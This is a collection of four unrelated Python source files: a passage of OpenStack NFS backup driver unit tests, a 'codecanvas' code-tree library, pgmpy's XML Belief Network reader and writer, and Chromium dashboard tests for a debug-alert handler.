deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
service.backup(deltabackup, self.volume_file)
deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
self.assertEqual(deltabackup['container'], container_name)
content1 = service._read_sha256file(backup)
content2 = service._read_sha256file(deltabackup)
# Verify that two shas are changed at index 16 and 20
self.assertNotEqual(content1['sha256s'][16], content2['sha256s'][16])
self.assertNotEqual(content1['sha256s'][20], content2['sha256s'][20])
def test_backup_delta_two_blocks_in_object_change(self):
volume_id = '5f3f810a-2ff3-4905-aaa3-0000005814ab'
def _fake_generate_object_name_prefix(self, backup):
az = 'az_fake'
backup_name = '%s_backup_%s' % (az, backup['id'])
volume = 'volume_%s' % (backup['volume_id'])
prefix = volume + '_' + backup_name
return prefix
# Raise a pseudo exception.BackupDriverException.
self.stubs.Set(nfs.NFSBackupDriver,
'_generate_object_name_prefix',
_fake_generate_object_name_prefix)
self.flags(backup_file_size=(8 * 1024))
self.flags(backup_sha_block_size_bytes=1024)
container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
'', 1)
self._create_backup_db_entry(volume_id=volume_id,
container=container_name,
backup_id=123)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
backup = objects.Backup.get_by_id(self.ctxt, 123)
self.assertEqual(backup['container'], container_name)
# Create incremental backup with no change to contents
self.volume_file.seek(16 * 1024)
self.volume_file.write(os.urandom(1024))
self.volume_file.seek(20 * 1024)
self.volume_file.write(os.urandom(1024))
self._create_backup_db_entry(volume_id=volume_id,
container=container_name,
backup_id=124,
parent_id=123)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
service.backup(deltabackup, self.volume_file)
deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
self.assertEqual(deltabackup['container'], container_name)
# Verify that two shas are changed at index 16 and 20
content1 = service._read_sha256file(backup)
content2 = service._read_sha256file(deltabackup)
self.assertNotEqual(content1['sha256s'][16], content2['sha256s'][16])
self.assertNotEqual(content1['sha256s'][20], content2['sha256s'][20])
def test_backup_backup_metadata_fail(self):
"""Test of when an exception occurs in backup().
In backup(), after an exception occurs in
self._backup_metadata(), we want to check the process of an
exception handler.
"""
volume_id = '26481bc2-fc85-40ae-8a4a-0000000b24e5'
self._create_backup_db_entry(volume_id=volume_id)
self.flags(backup_compression_algorithm='none')
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
def fake_backup_metadata(self, backup, object_meta):
raise exception.BackupDriverException(message=_('fake'))
# Raise a pseudo exception.BackupDriverException.
self.stubs.Set(nfs.NFSBackupDriver, '_backup_metadata',
fake_backup_metadata)
# We expect that an exception be notified directly.
self.assertRaises(exception.BackupDriverException,
service.backup,
backup, self.volume_file)
def test_backup_backup_metadata_fail2(self):
"""Test of when an exception occurs in an exception handler.
In backup(), after an exception occurs in
self._backup_metadata(), we want to check the process when the
second exception occurs in self.delete().
"""
volume_id = 'ce18dbc6-65d6-49ca-8866-000000b1c05b'
self._create_backup_db_entry(volume_id=volume_id)
self.flags(backup_compression_algorithm='none')
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
def fake_backup_metadata(self, backup, object_meta):
raise exception.BackupDriverException(message=_('fake'))
# Raise a pseudo exception.BackupDriverException.
self.stubs.Set(nfs.NFSBackupDriver, '_backup_metadata',
fake_backup_metadata)
def fake_delete(self, backup):
raise exception.BackupOperationError()
# Raise a pseudo exception.BackupOperationError.
self.stubs.Set(nfs.NFSBackupDriver, 'delete', fake_delete)
# We expect that the second exception is notified.
self.assertRaises(exception.BackupOperationError,
service.backup,
backup, self.volume_file)
def test_restore_uncompressed(self):
volume_id = 'b6f39bd5-ad93-474b-8ee4-000000a0d11e'
self._create_backup_db_entry(volume_id=volume_id)
self.flags(backup_compression_algorithm='none')
self.flags(backup_sha_block_size_bytes=32)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
with tempfile.NamedTemporaryFile() as restored_file:
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.restore(backup, volume_id, restored_file)
self.assertTrue(filecmp.cmp(self.volume_file.name,
restored_file.name))
def test_restore_bz2(self):
volume_id = '3d4f044e-dc78-49e1-891e-000000549431'
self._create_backup_db_entry(volume_id=volume_id)
self.flags(backup_compression_algorithm='bz2')
self.flags(backup_file_size=(1024 * 3))
self.flags(backup_sha_block_size_bytes=1024)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
with tempfile.NamedTemporaryFile() as restored_file:
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.restore(backup, volume_id, restored_file)
self.assertTrue(filecmp.cmp(self.volume_file.name,
restored_file.name))
def test_restore_zlib(self):
volume_id = 'ab84fe59-19a8-4c7d-9103-00000061488b'
self._create_backup_db_entry(volume_id=volume_id)
self.flags(backup_compression_algorithm='zlib')
self.flags(backup_file_size=(1024 * 3))
self.flags(backup_sha_block_size_bytes = 1024)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
with tempfile.NamedTemporaryFile() as restored_file:
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.restore(backup, volume_id, restored_file)
self.assertTrue(filecmp.cmp(self.volume_file.name,
restored_file.name))
def test_restore_delta(self):
volume_id = '486249dc-83c6-4a02-8d65-000000d819e7'
def _fake_generate_object_name_prefix(self, backup):
az = 'az_fake'
backup_name = '%s_backup_%s' % (az, backup['id'])
volume = 'volume_%s' % (backup['volume_id'])
prefix = volume + '_' + backup_name
return prefix
# Raise a pseudo exception.BackupDriverException.
self.stubs.Set(nfs.NFSBackupDriver,
'_generate_object_name_prefix',
_fake_generate_object_name_prefix)
self.flags(backup_file_size =(1024 * 8))
self.flags(backup_sha_block_size_bytes=1024)
container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
'', 1)
self._create_backup_db_entry(volume_id=volume_id,
container=container_name,
backup_id=123)
service = nfs.NFSBackupDriver(self.ctxt)
self.volume_file.seek(0)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.backup(backup, self.volume_file)
# Create incremental backup with no change to contents
self.volume_file.seek(16 * 1024)
self.volume_file.write(os.urandom(1024))
self.volume_file.seek(20 * 1024)
self.volume_file.write(os.urandom(1024))
self._create_backup_db_entry(volume_id=volume_id,
container=container_name,
backup_id=124,
parent_id=123)
self.volume_file.seek(0)
deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
service.backup(deltabackup, self.volume_file, True)
deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
with tempfile.NamedTemporaryFile() as restored_file:
backup = objects.Backup.get_by_id(self.ctxt, 124)
service.restore(backup, volume_id,
restored_file)
self.assertTrue(filecmp.cmp(self.volume_file.name,
restored_file.name))
def test_delete(self):
volume_id = '4b5c39f2-4428-473c-b85a-000000477eca'
self._create_backup_db_entry(volume_id=volume_id)
service = nfs.NFSBackupDriver(self.ctxt)
backup = objects.Backup.get_by_id(self.ctxt, 123)
service.delete(backup)
def test_get_compressor(self):
service = nfs.NFSBackupDriver(self.ctxt)
compressor = service._get_compressor('None')
self.assertIsNone(compressor)
compressor = service._get_compressor('zlib')
self.assertEqual(compressor, zlib)
compressor = service._get_compressor('bz2')
self.assertEqual(compressor, bz2)
self.assertRaises(ValueError, service._get_compressor, 'fake')
def test_prepare_output_data_effective_compression(self):
service = nfs.NFSBackupDriver(self.ctxt)
# Set up buffer of 128 zeroed bytes
fake_data = buffer(bytearray(128))
result = service._prepare_output_data(fake_data)
self.assertEqual('zlib', result[0])
self.assertTrue(len(result) < len(fake_data))
def test_prepare_output_data_no_compresssion(self):
self.flags(backup_compression_algorithm='none')
service = nfs.NFSBackupDriver(self.ctxt)
# Set up buffer of 128 zeroed bytes
fake_data = buffer(bytearray(128))
result = service._prepare_output_data(fake_data)
self.assertEqual('none', result[0])
self.assertEqual(fake_data, result[1])
def test_prepare_output_data_ineffective_compression(self):
service = nfs.NFSBackupDriver(self.ctxt)
# Set up buffer of 128 zeroed bytes
fake_data = buffer(bytearray(128))
# Pre-compress so that compression in the driver will be ineffective.
already_compressed_data = service.compressor.compress(fake_data)
result = service._prepare_output_data(already_compressed_data)
self.assertEqual('none', result[0])
self.assertEqual(already_compressed_data, result[1])
| |
# codecanvas.py
# creates hierarchically accessible code-structures
# author: Christophe VG
# helper functions to wrap return values in a list or not
def maybe_list(codes):
if len(codes) < 1: return None
elif len(codes) == 1: return codes[0]
else: return List(codes)
def as_list(codes):
if codes is None: return []
elif isinstance(codes, list): return codes
elif isinstance(codes, List): return list(codes)
elif isinstance(codes, tuple): return codes[0].codes
else: return [codes]
# the single code/node class
class Code(object):
def __init__(self, data=""):
self.data = data
self.stick_to = None
self.tags = []
self.sticking = {"top":[], "bottom": []}
self.floating = []
self.bottom = []
self._parent = None
def _children(self):
return self.sticking["top"] + self.floating + self.sticking["bottom"]
children = property(_children)
def remove_child(self, index):
try: self.update_child(index, None)
except: pass
def update_child(self, index, value):
if index < len(self.sticking["top"]):
if value is None: self.sticking["top"].pop(index)
else: self.sticking["top"][index] = value
return
index -= len(self.sticking["top"])
if index < len(self.floating):
if value is None: self.floating.pop(index)
else: self.floating[index] = value
return
index -= len(self.floating)
if index < len(self.sticking["bottom"]):
if value is None: self.sticking["bottom"].pop(index)
else: self.sticking["bottom"][index] = value
return
raise IndexError, "index " + str(index) + " is not within child range."
def _sticky(self):
return not self.stick_to is None
sticky = property(_sticky)
def __str__(self):
children = ""
if len(self) > 0:
for child in self:
children += "\n" + \
"\n".join([" " + line for line in str(child).split("\n")])
tags = "" if len(self.tags) < 1 else " [" + ",".join(self.tags) + "]"
sticky = "" if not self.sticky else " <sticky>"
me = "" if self.__class__.__name__ == "Code" \
else self.__class__.__name__ + " "
return (me + str(self.data) + tags + sticky + children).lstrip().rstrip()
def __iter__(self):
try:
return iter(self.children)
except:
return iter([])
def __len__(self):
return len(self.children)
def __getitem__(self, index):
return self.children[index]
def stick_top(self):
if self.stick_to == "top": return
if self._parent:
if self.sticky: self._parent.sticking["bottom"].remove(self)
else: self._parent.floating.remove(self)
self._parent.sticking["top"].append(self)
self.stick_to = "top"
return self
def stick_bottom(self):
if self.stick_to == "bottom": return
if self._parent:
if self.sticky: self._parent.sticking["top"].remove(self)
else: self._parent.floating.remove(self)
self._parent.sticking["bottom"].append(self)
self.stick_to = "bottom"
return self
def unstick(self):
if not self.sticky: return
if self._parent:
self._parent.sticking[self.stick_to].remove(self)
self._parent.floating.append(self)
self.stick_to = None
return self
def tag(self, *tags):
self.tags.extend(tags)
self.tags = sorted(list(set(self.tags)))
return self
def untag(self, *tags):
self.tags = filter(lambda x: not x in tags, self.tags)
return self
def append(self, *children):
for child in children:
child._parent = self
if child.sticky: self.sticking[child.stick_to].append(child)
else: self.floating.append(child)
return maybe_list(children)
def contains(self, *children):
self.append(*children)
return self
def _insert(self, relative, *siblings):
if self._parent is None: raise RuntimeError, self + " has no parent"
if self.sticky: raise RuntimeError, self + " is sticky, can't insert"
index = self._parent.floating.index(self) + relative
for sibling in siblings:
if sibling.sticky: raise RuntimeError, sibling + " is sticky, can't insert"
sibling._parent = self._parent
self._parent.floating.insert(index, sibling)
return maybe_list(siblings)
def insert_before(self, *siblings):
for sibling in siblings:
sibling._insert(0, self)
return self
def insert_after(self, *siblings):
for sibling in siblings:
sibling._insert(1, self)
return self
def select(self, *tags):
"""
Selects children of which the chain up to them is marked with tags.
"""
if len(tags) < 1: return None
codes = []
tag = tags[0]
more = len(tags) > 1
for child in self:
if tag in child.tags or tag == "*":
if more: codes.extend(as_list(child.select(*tags[1:])))
else: codes.append(child)
return maybe_list(codes)
def find(self, *tags):
"""
Finds codes that have tags.
"""
tags = set(tags)
codes = []
class Finder(Visitor):
def visit_all(self, code):
if tags.issubset(code.tags): codes.append(code)
if len(code) > 0:
for child in code: child.accept(self)
self.accept(Finder())
return maybe_list(codes)
def accept(self, visitor):
# try _all
try: getattr(visitor, "visit_all")(self)
except AttributeError: pass
# try _specific_class_implementation
name = "visit_" + self.__class__.__name__
try: return getattr(visitor, name)(self)
except AttributeError, e:
expected = "'{0}' object has no attribute '{1}'".format(
visitor.__class__.__name__, name)
if str(e) != expected:
# Whoops some other AttributeError ... while calling
raise
else:
# no handler, that's ok
pass
return None
# wrapper for multiple Codes, offering the same interface, dispatching to list
# of Codes and aggregating results
class List(Code):
def __init__(self, codes=[]):
self.codes = codes
def _children(self): return self.codes
children = property(_children)
def __iter__(self):
return iter(self.codes)
def __len__(self):
return len(self.codes)
def __getitem__(self, index):
return self.codes[index]
def stick_top(self):
for code in self.codes: code.stick_top()
return self
def stick_bottom(self):
for code in self.codes: code.stick_bottom()
return self
def unstick(self):
for code in self.codes: code.unstick()
return self
def tag(self, *tags):
for code in self.codes: code.tag(*tags)
return self
def untag(self, *tags):
for code in self.codes: code.untag(*tags)
return self
def append(self, *children):
for code in self.codes: code.append(*children)
return maybe_list(children)
def insert_before(self, *siblings):
siblings = as_list(siblings)
for code in self.codes: code.insert_before(*siblings)
return self
def insert_after(self, *siblings):
siblings = as_list(siblings)
for code in self.codes: code.insert_after(*siblings)
return self
def insert_after(self, *siblings):
for code in self.codes: code.insert_after(*siblings)
return self
def contains(self, *children):
for code in self.codes: code.contains(*children)
return self
def select(self, *tags):
selected = []
for code in self.codes: selected.extend(as_list(code.select(*tags)))
return maybe_list(selected)
def find(self, *tags):
selected = []
for code in self.codes: selected.extend(as_list(code.find(*tags)))
return maybe_list(selected)
class Canvas(Code):
def __str__(self):
return "\n".join([str(child) for child in self])
class Visitor(object):
"""
Base-class for CodeCanvas-Visitors
"""
def visit_all(self, code): pass
def visit_Code(self, code): pass
def visit_List(self, list): pass
# Code implementations to override default functionality
class WithoutChildModification(object):
def append(self, *children): raise NotImplementedError
def contains(self, *children): raise NotImplementedError
def _insert(self, relative, *siblings): raise NotImplementedError
class WithoutChildren(WithoutChildModification):
def _children(self): raise NotImplementedError
children = property(_children)
def __len__(self): return 0
| |
import numpy as np
try:
from lxml import etree
except ImportError:
try:
import xml.etree.ElementTree as etree
except ImportError:
# try:
# import xml.etree.cElementTree as etree
# except ImportError:
# commented out as causing problem with dictionary attributes
print("Failed to import ElementTree from any known place")
from pgmpy.models import BayesianModel
from pgmpy.factors.discrete import TabularCPD
from pgmpy.extern.six.moves import map, range
class XBNReader(object):
"""
Base class for reading XML Belief Network File Format.
"""
def __init__(self, path=None, string=None):
"""
Initializer for XBNReader class.
Parameters
----------
path: str or file
Path of the file containing XBN data.
string: str
String of XBN data
Examples
--------
reader = XBNReader('test_XBN.xml')
Reference
---------
http://xml.coverpages.org/xbn-MSdefault19990414.html
"""
if path:
self.network = etree.parse(path).getroot()
elif string:
self.network = etree.fromstring(string)
else:
raise ValueError("Must specify either path or string")
self.bnmodel = self.network.find('BNMODEL')
self.analysisnotebook = self.get_analysisnotebook_values()
self.model_name = self.get_bnmodel_name()
self.static_properties = self.get_static_properties()
self.variables = self.get_variables()
self.edges = self.get_edges()
self.variable_CPD = self.get_distributions()
def get_analysisnotebook_values(self):
"""
Returns a dictionary of the attributes of ANALYSISNOTEBOOK tag
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_analysisnotebook_values()
{'NAME': "Notebook.Cancer Example From Neapolitan",
'ROOT': "Cancer"}
"""
return {key: value for key, value in self.network.items()}
def get_bnmodel_name(self):
"""
Returns the name of the BNMODEL.
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_bnmodel_name()
'Cancer'
"""
return self.network.find('BNMODEL').get('NAME')
def get_static_properties(self):
"""
Returns a dictionary of STATICPROPERTIES
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_static_properties()
{'FORMAT': 'MSR DTAS XML', 'VERSION': '0.2', 'CREATOR': 'Microsoft Research DTAS'}
"""
return {tags.tag: tags.get('VALUE') for tags in self.bnmodel.find('STATICPROPERTIES')}
def get_variables(self):
"""
Returns a list of variables.
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_variables()
{'a': {'TYPE': 'discrete', 'XPOS': '13495',
'YPOS': '10465', 'DESCRIPTION': '(a) Metastatic Cancer',
'STATES': ['Present', 'Absent']}
'b': {'TYPE': 'discrete', 'XPOS': '11290',
'YPOS': '11965', 'DESCRIPTION': '(b) Serum Calcium Increase',
'STATES': ['Present', 'Absent']},
'c': {....},
'd': {....},
'e': {....}
}
"""
variables = {}
for variable in self.bnmodel.find('VARIABLES'):
variables[variable.get('NAME')] = {'TYPE': variable.get('TYPE'),
'XPOS': variable.get('XPOS'),
'YPOS': variable.get('YPOS'),
'DESCRIPTION': variable.find('DESCRIPTION').text,
'STATES': [state.text for state in variable.findall('STATENAME')]}
return variables
def get_edges(self):
"""
Returns a list of tuples. Each tuple contains two elements (parent, child) for each edge.
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_edges()
[('a', 'b'), ('a', 'c'), ('b', 'd'), ('c', 'd'), ('c', 'e')]
"""
return [(arc.get('PARENT'), arc.get('CHILD')) for arc in self.bnmodel.find('STRUCTURE')]
def get_distributions(self):
"""
Returns a dictionary of name and its distribution. Distribution is a ndarray.
The ndarray is stored in the standard way such that the rightmost variable changes most often.
Consider a CPD of variable 'd' which has parents 'b' and 'c' (distribution['CONDSET'] = ['b', 'c'])
| d_0 d_1
---------------------------
b_0, c_0 | 0.8 0.2
b_0, c_1 | 0.9 0.1
b_1, c_0 | 0.7 0.3
b_1, c_1 | 0.05 0.95
The value of distribution['d']['DPIS'] for the above example will be:
array([[ 0.8 , 0.2 ], [ 0.9 , 0.1 ], [ 0.7 , 0.3 ], [ 0.05, 0.95]])
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_distributions()
{'a': {'TYPE': 'discrete', 'DPIS': array([[ 0.2, 0.8]])},
'e': {'TYPE': 'discrete', 'DPIS': array([[ 0.8, 0.2],
[ 0.6, 0.4]]), 'CONDSET': ['c'], 'CARDINALITY': [2]},
'b': {'TYPE': 'discrete', 'DPIS': array([[ 0.8, 0.2],
[ 0.2, 0.8]]), 'CONDSET': ['a'], 'CARDINALITY': [2]},
'c': {'TYPE': 'discrete', 'DPIS': array([[ 0.2 , 0.8 ],
[ 0.05, 0.95]]), 'CONDSET': ['a'], 'CARDINALITY': [2]},
'd': {'TYPE': 'discrete', 'DPIS': array([[ 0.8 , 0.2 ],
[ 0.9 , 0.1 ],
[ 0.7 , 0.3 ],
[ 0.05, 0.95]]), 'CONDSET': ['b', 'c']}, 'CARDINALITY': [2, 2]}
"""
distribution = {}
for dist in self.bnmodel.find('DISTRIBUTIONS'):
variable_name = dist.find('PRIVATE').get('NAME')
distribution[variable_name] = {'TYPE': dist.get('TYPE')}
if dist.find('CONDSET') is not None:
distribution[variable_name]['CONDSET'] = [var.get('NAME') for
var in dist.find('CONDSET').findall('CONDELEM')]
distribution[variable_name]['CARDINALITY'] = np.array(
[len(set(np.array([list(map(int, dpi.get('INDEXES').split()))
for dpi in dist.find('DPIS')])[:, i]))
for i in range(len(distribution[variable_name]['CONDSET']))])
distribution[variable_name]['DPIS'] = np.array(
[list(map(float, dpi.text.split())) for dpi in dist.find('DPIS')])
return distribution
def get_model(self):
"""
Returns an instance of Bayesian Model.
"""
model = BayesianModel(self.edges)
model.name = self.model_name
tabular_cpds = []
for var, values in self.variable_CPD.items():
evidence = values['CONDSET'] if 'CONDSET' in values else []
cpd = values['DPIS']
evidence_card = values['CARDINALITY'] if 'CARDINALITY' in values else []
states = self.variables[var]['STATES']
cpd = TabularCPD(var, len(states), cpd,
evidence=evidence,
evidence_card=evidence_card)
tabular_cpds.append(cpd)
model.add_cpds(*tabular_cpds)
for var, properties in self.variables.items():
model.node[var] = properties
return model
class XBNWriter(object):
"""
Base class for writing XML Belief Network file format.
"""
def __init__(self, model, encoding='utf-8', prettyprint=True):
"""
Initializer for XBNWriter class
Parameters
----------
model: BayesianModel Instance
Model to write
encoding: str(optional)
Encoding for test data
prettyprint: Bool(optional)
Indentation in output XML if true
Reference
---------
http://xml.coverpages.org/xbn-MSdefault19990414.html
Examples
--------
>>> writer = XBNWriter(model)
"""
if not isinstance(model, BayesianModel):
raise TypeError("Model must be an instance of Bayesian Model.")
self.model = model
self.encoding = encoding
self.prettyprint = prettyprint
self.network = etree.Element('ANALYSISNOTEBOOK')
self.bnmodel = etree.SubElement(self.network, 'BNMODEL')
if self.model.name:
etree.SubElement(self.bnmodel, 'NAME').text = self.model.name
self.variables = self.set_variables(self.model.node)
self.structure = self.set_edges(sorted(self.model.edges()))
self.distribution = self.set_distributions()
def __str__(self):
"""
Return the XML as string.
"""
if self.prettyprint:
self.indent(self.network)
return etree.tostring(self.network, encoding=self.encoding)
def indent(self, elem, level=0):
"""
Inplace prettyprint formatter.
"""
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
self.indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def set_analysisnotebook(self, **data):
"""
Set attributes for ANALYSISNOTEBOOK tag
Parameters
----------
**data: dict
{name: value} for the attributes to be set.
Examples
--------
>>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
>>> writer = XBNWriter()
>>> writer.set_analysisnotebook(NAME="Notebook.Cancer Example From Neapolitan",
... ROOT='Cancer')
"""
for key, value in data.items():
self.network.set(str(key), str(value))
def set_bnmodel_name(self, name):
"""
Set the name of the BNMODEL.
Parameters
----------
name: str
Name of the BNModel.
Examples
--------
>>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
>>> writer = XBNWriter()
>>> writer.set_bnmodel_name("Cancer")
"""
self.bnmodel.set('NAME', str(name))
def set_static_properties(self, **data):
"""
Set STATICPROPERTIES tag for the network
Parameters
----------
**data: dict
{name: value} for name and value of the property.
Examples
--------
>>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
>>> writer = XBNWriter()
>>> writer.set_static_properties(FORMAT="MSR DTAS XML", VERSION="0.2", CREATOR="Microsoft Research DTAS")
"""
static_prop = etree.SubElement(self.bnmodel, 'STATICPROPERTIES')
for key, value in data.items():
etree.SubElement(static_prop, key, attrib={'VALUE': value})
def set_variables(self, data):
"""
Set variables for the network.
Parameters
----------
data: dict
dict for variable in the form of example as shown.
Examples
--------
>>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
>>> writer = XBNWriter()
>>> writer.set_variables({'a': {'TYPE': 'discrete', 'XPOS': '13495',
... 'YPOS': '10465', 'DESCRIPTION': '(a) Metastatic Cancer',
... 'STATES': ['Present', 'Absent']}
... 'b': {'TYPE': 'discrete', 'XPOS': '11290',
... 'YPOS': '11965', 'DESCRIPTION': '(b) Serum Calcium Increase',
... 'STATES': ['Present', 'Absent']}})
"""
variables = etree.SubElement(self.bnmodel, "VARIABLES")
for var in sorted(data):
variable = etree.SubElement(variables, 'VAR', attrib={'NAME': var, 'TYPE': data[var]['TYPE'],
'XPOS': data[var]['XPOS'], 'YPOS': data[var]['YPOS']})
etree.SubElement(variable, 'DESCRIPTION', attrib={'DESCRIPTION': data[var]['DESCRIPTION']})
for state in data[var]['STATES']:
etree.SubElement(variable, 'STATENAME').text = state
def set_edges(self, edge_list):
"""
Set edges/arc in the network.
Parameters
----------
edge_list: array_like
list, tuple, dict or set whose each elements has two values (parent, child).
Examples
--------
>>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
>>> writer = XBNWriter()
>>> writer.set_edges([('a', 'b'), ('a', 'c'), ('b', 'd'), ('c', 'd'), ('c', 'e')])
"""
structure = etree.SubElement(self.bnmodel, 'STRUCTURE')
for edge in edge_list:
etree.SubElement(structure, 'ARC', attrib={'PARENT': edge[0], 'CHILD': edge[1]})
def set_distributions(self):
"""
Set distributions in the network.
Examples
--------
>>> from pgmpy.readwrite.XMLBeliefNetwork import XBNWriter
>>> writer =XBNWriter()
>>> writer.set_distributions()
"""
distributions = etree.SubElement(self.bnmodel, 'DISTRIBUTIONS')
cpds = self.model.get_cpds()
cpds.sort(key=lambda x: x.variable)
for cpd in cpds:
cpd_values = cpd.values.ravel()
var = cpd.variable
dist = etree.SubElement(distributions, 'DIST', attrib={'TYPE': self.model.node[var]['TYPE']})
etree.SubElement(dist, 'PRIVATE', attrib={'NAME': var})
dpis = etree.SubElement(dist, 'DPIS')
evidence = cpd.variables[:0:-1]
if evidence:
condset = etree.SubElement(dist, 'CONDSET')
for condelem in sorted(evidence):
etree.SubElement(condset, 'CONDELEM', attrib={'NAME': condelem})
# TODO: Get Index value.
for val in range(0, len(cpd_values), 2):
etree.SubElement(dpis, "DPI", attrib={'INDEXES': ' '}).text = \
" " + str(cpd_values[val]) + " " + str(cpd_values[val+1]) + " "
else:
etree.SubElement(dpis, "DPI").text = ' ' + ' '.join(map(str, cpd_values))
| |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import mock
import webapp2
import webtest
from dashboard import debug_alert
from dashboard import testing_common
from dashboard import utils
from dashboard.models import anomaly
from dashboard.models import anomaly_config
from dashboard.models import graph_data
_SAMPLE_SERIES = [
(300, 60.06), (301, 60.36), (302, 61.76), (303, 60.06), (304, 61.24),
(305, 60.65), (306, 55.61), (307, 61.88), (308, 61.51), (309, 59.58),
(310, 71.79), (311, 71.97), (312, 71.63), (313, 67.16), (314, 70.91),
(315, 73.40), (316, 71.00), (317, 69.45), (318, 67.16), (319, 66.05),
]
class DebugAlertTest(testing_common.TestCase):
def setUp(self):
super(DebugAlertTest, self).setUp()
app = webapp2.WSGIApplication(
[('/debug_alert', debug_alert.DebugAlertHandler)])
self.testapp = webtest.TestApp(app)
def _AddSampleData(self):
"""Adds a Test and Row entities, and returns the Test key."""
testing_common.AddTests(['M'], ['b'], {'suite': {'foo': {}}})
test_path = 'M/b/suite/foo'
rows_dict = {x: {'value': y} for x, y in _SAMPLE_SERIES}
testing_common.AddRows(test_path, rows_dict)
return utils.TestKey(test_path)
def testGet_WithInvalidTestPath_ShowsFormAndError(self):
response = self.testapp.get('/debug_alert?test_path=foo')
self.assertIn('<form', response.body)
self.assertIn('class="error"', response.body)
def testGet_WithValidTestPath_ShowsChart(self):
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
response = self.testapp.get('/debug_alert?test_path=%s' % test_path)
self.assertIn('id="plot"', response.body)
def testPost_SameAsGet(self):
# Post is the same as get for this endpoint.
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
get_response = self.testapp.get('/debug_alert?test_path=%s' % test_path)
post_response = self.testapp.post('/debug_alert?test_path=%s' % test_path)
self.assertEqual(get_response.body, post_response.body)
def testGet_WithNoParameters_ShowsForm(self):
response = self.testapp.get('/debug_alert')
self.assertIn('<form', response.body)
self.assertNotIn('id="plot"', response.body)
def testGet_WithRevParameter_EmbedsCorrectRevisions(self):
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
response = self.testapp.get(
'/debug_alert?test_path=%s&rev=%s&num_before=%s&num_after=%s' %
(test_path, 305, 10, 5))
self.assertEqual(
[300, 301, 302, 303, 304, 305, 306, 307, 308, 309],
self.GetEmbeddedVariable(response, 'LOOKUP'))
def testGet_InvalidNumBeforeParameter_ShowsFormAndError(self):
test_key = self._AddSampleData()
test_path = utils.TestPath(test_key)
response = self.testapp.get(
'/debug_alert?test_path=%s&rev=%s&num_before=%s&num_after=%s' %
(test_path, 305, 'foo', 5))
self.assertIn('<form', response.body)
self.assertIn('class="error"', response.body)
self.assertNotIn('LOOKUP', response.body)
def _AddAnomalyConfig(self, config_name, test_key, config_dict):
"""Adds a custom anomaly config which applies to one test."""
anomaly_config_key = anomaly_config.AnomalyConfig(
id=config_name,
config=config_dict,
patterns=[utils.TestPath(test_key)]).put()
return anomaly_config_key
@mock.patch.object(debug_alert, 'SimulateAlertProcessing')
def testGet_TestHasOverriddenConfig_ConfigUsed(self, simulate_mock):
test_key = self._AddSampleData()
# Add a config which applies to the test. The test is updated upon put.
self._AddAnomalyConfig('X', test_key, {'min_absolute_change': 10})
test_key.get().put()
response = self.testapp.get(
'/debug_alert?test_path=%s' % utils.TestPath(test_key))
# The custom config should be used when simulating alert processing.
simulate_mock.assert_called_once_with(mock.ANY, min_absolute_change=10)
# The config JSON should also be put into the form on the page.
self.assertIn('"min_absolute_change": 10', response.body)
@mock.patch.object(debug_alert, 'SimulateAlertProcessing')
def testGet_WithValidCustomConfig_ConfigUsed(self, simulate_mock):
test_key = self._AddSampleData()
response = self.testapp.get(
'/debug_alert?test_path=%s&config=%s' %
(utils.TestPath(test_key),
'{"min_relative_change":0.75}'))
# The custom config should be used when simulating alert processing.
simulate_mock.assert_called_once_with(mock.ANY, min_relative_change=0.75)
# The config JSON should also be put into the form on the page.
self.assertIn('"min_relative_change": 0.75', response.body)
def testGet_WithInvalidCustomConfig_ErrorShown(self):
test_key = self._AddSampleData()
response = self.testapp.get(
'/debug_alert?test_path=%s&config=%s' %
(utils.TestPath(test_key), 'not valid json'))
# The error message should be on the page; JS constants should not be.
self.assertIn('Invalid JSON', response.body)
